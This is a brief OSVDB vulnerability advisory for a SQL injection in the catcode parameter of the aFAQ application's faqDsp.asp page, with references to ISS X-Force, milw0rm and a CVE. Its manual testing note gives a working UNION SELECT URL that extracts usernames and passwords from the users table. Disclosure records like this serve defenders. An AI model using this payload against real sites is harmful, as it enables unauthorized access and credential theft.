aFAQ faqDsp.asp catcode Variable SQL Injection

2006-12-28T00:00:00
ID OSVDB:35832
Type osvdb
Reporter OSVDB
Modified 2006-12-28T00:00:00

Description

Manual Testing Notes

http://[target]/[path]//faqDsp.asp?catcode=-1%20union%20select%20username,password,0,0,0,0,0,0,0,0,0,0,0,0%20from%20users

References:

ISS X-Force ID: 31130
Generic Exploit URL: http://milw0rm.com/exploits/3031
CVE-2006-6831